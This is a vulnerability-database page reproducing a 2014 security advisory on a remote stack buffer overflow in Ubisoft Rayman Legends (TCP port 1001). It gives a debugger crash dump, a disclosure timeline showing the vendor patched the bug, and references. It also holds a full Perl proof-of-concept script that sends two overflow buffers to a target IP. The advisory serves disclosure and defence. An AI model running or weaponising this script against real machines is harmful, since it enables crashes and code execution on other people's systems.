Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2014-5187
HistoryJun 17, 2014 - 12:00 a.m.

Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability

2014-06-1700:00:00
Gjoko Krstic
zeroscience.mk
37

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.6 High

AI Score

Confidence

High

0.095 Low

EPSS

Percentile

94.8%

JSON

Title: Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
Advisory ID: ZSL-2014-5187
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 17.06.2014

Summary

Rayman Legends is a 2013 platform game developed by Ubisoft Montpellier and published by Ubisoft. It is the fifth main title in the Rayman series and the direct sequel to the 2011 game Rayman Origins. The game was released for Microsoft Windows, Xbox 360, PlayStation 3, Wii U, and PlayStation Vita platforms in August and September 2013. PlayStation 4 and Xbox One versions were released in February 2014.

Description

The vulnerability is caused due to a memset() boundary error in the processing of incoming data thru raw socket connections on TCP port 1001, which can be exploited to cause a stack based buffer overflow by sending a long string of bytes on the second connection. Successful exploitation could allow execution of arbitrary code on the affected node.

--------------------------------------------------------------------------------

(15a8.f0c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000 eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0 nv up ei pl nz na pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 MSVCR100!memset+0x5f: 715e26df f3ab rep stos dword ptr es:[edi] 0:028> d esp 0f16dcec 42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00 BBBBd........... 0f16dcfc 42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c BBBBBBBB"...PBK. 0f16dd0c 90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00 .C......(....... 0f16dd1c 50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f PBK.l.......L... 0f16dd2c e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07 ....H.......<... 0f16dd3c 3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41 <......u....AAAA 0f16dd4c 41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42 AAAAAAAAAAAABBBB 0f16dd5c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
--------------------------------------------------------------------------------

Vendor

Ubisoft Entertainment S.A. - <http://www.ubi.com>

Affected Version

1.2.103716, 1.1.100477 and 1.0.95278

Tested On

Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)

Vendor Status

[22.05.2014] Vulnerability discovered.
[23.05.2014] Vendor contacted.
[25.05.2014] Vendor responds forwarding communication to security department.
[26.05.2014] Vendor replies asking more details.
[26.05.2014] Sent details to the vendor.
[27.05.2014] Vendor confirms the vulnerability, scheduling a patch release date.
[17.06.2014] Vendor releases Patch 1.02.140380 (Rayman Legends 1.3.140380) to address this issue.
[17.06.2014] Coordinated public security advisory released.

PoC

gloogloo.pl

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Marc-Andre!

References

[1] https://support.ubi.com/en-gb/FAQ.aspx?platformid=9&brandid=210&productid=4328&faqid=kA030000000eaKDCAY
[2] <http://packetstormsecurity.com/files/127133&gt;
[3] <http://www.exploit-db.com/exploits/33804/&gt;
[4] <http://cxsecurity.com/issue/WLB-2014060096&gt;
[5] <http://osvdb.org/show/osvdb/108219&gt;
[6] <http://www.securityfocus.com/bid/68080&gt;
[7] <http://1337day.com/exploit/22343&gt;
[8] <http://www.vfocus.net/art/20140618/11587.html&gt;
[9] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-4334&gt;
[10] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4334&gt;
[11] <http://xforce.iss.net/xforce/xfdb/93888&gt;
[12] <http://secunia.com/advisories/59273/&gt;

Changelog

[17.06.2014] - Initial release
[18.06.2014] - Added reference [2], [3], [4], [5] and [6]
[19.06.2014] - Added reference [7] and [8]
[20.06.2014] - Added reference [9] and [10]
[05.07.2014] - Added reference [11]
[05.10.2014] - Added reference [12]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset() boundary error in the
# processing of incoming data thru raw socket connections on TCP port 1001,
# which can be exploited to cause a stack based buffer overflow by sending a
# long string of bytes on the second connection. Successful exploitation could
# allow execution of arbitrary code on the affected node.
#
# ===========================================================================
#
# (15a8.f0c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0         nv up ei pl nz na pe cy
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
# MSVCR100!memset+0x5f:
# 715e26df f3ab            rep stos dword ptr es:[edi]
# 0:028&gt; d esp
# 0f16dcec  42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00  BBBBd...........
# 0f16dcfc  42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c  BBBBBBBB"...PBK.
# 0f16dd0c  90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00  .C......(.......
# 0f16dd1c  50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f  PBK.l.......L...
# 0f16dd2c  e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07  ....H.......&lt;...
# 0f16dd3c  3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41  &lt;......u....AAAA
# 0f16dd4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
# 0f16dd5c  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
# 22.05.2014
# 
#

use IO::Socket;

print
 "
 @****************************************@
 |                                        |
 | Ubisoft Rayman Legends BoF PoC Script  |
 |                                        |
 |              ZSL-2014-5187             |
 |                                        |
 @****************************************@
 ";

$ip="$ARGV[0]";

if($#ARGV!=0)
{
   print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n";
   exit();
}

print "\n\x20\x1c\x20Target: $ip\n";
print "\x20\x1c\x20Initiating first connection\n";

sleep 2;
$conn1=IO::Socket::INET-&gt;new(PeerAddr=&gt;$ip,PeerPort=&gt;1001,Proto=&gt;'tcp');
if(!$conn1)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn1 "\x44"x36;
print $conn1 "\x45\x45\x45\x45";
print $conn1 "\x46"x2000; # SC contain
print "\x20\x1c\x20Payload sent\n";
close $conn1;
print "\x20\x1c\x20First stage completed\n\x20\x1c\n";
print "\x20\x1c\x20Initiating second connection\n";

sleep 2;
$conn2=IO::Socket::INET-&gt;new(PeerAddr=&gt;$ip,PeerPort=&gt;1001,Proto=&gt;'tcp');
if(!$conn2)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn2 "\x41" x 16;
print $conn2 "\x42\x42\x42\x42"; # ESP -&gt;
print $conn2 "\x43"x1000; # SC contain
print "\x20\x1c\x20Payload sent\n";
print "\x20\x1c\x20Second stage completed\n";
close $conn2;
print "\x20\x1c\x20t00t!\n";
</ipaddr></p></body></html>

Related

cve 1
prion 1
cvelist 1
nvd 1
cve
cve
CVE-2014-4334
2022-10-03 16:20:45
prion
prion
Stack overflow
2014-06-19 14:55:00
cvelist
cvelist
CVE-2014-4334
2022-10-03 16:20:45
nvd
nvd
CVE-2014-4334
2014-06-19 14:55:08

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.6 High

AI Score

Confidence

High

0.095 Low

EPSS

Percentile

94.8%

JSON
Related for ZSL-2014-5187
cve1prion1cvelist1nvd1